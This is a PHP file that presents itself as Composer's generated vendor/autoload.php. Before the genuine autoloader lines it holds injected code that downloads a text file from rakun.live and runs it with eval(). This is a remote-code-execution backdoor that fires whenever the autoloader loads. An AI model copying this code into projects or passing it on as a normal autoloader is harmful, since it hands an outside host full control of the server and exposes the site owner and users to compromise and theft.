<?php
$url = file_get_contents(urldecode('https://rakun.live/landing/ajausud.txt'));
$url = "?> ".$url;
eval($url);

// autoload.php @generated by Composer

require_once __DIR__ . '/composer/autoload_real.php';

return ComposerAutoloaderInit5fbd5e3eee220a1320f1963ea6aa23cf::getLoader();
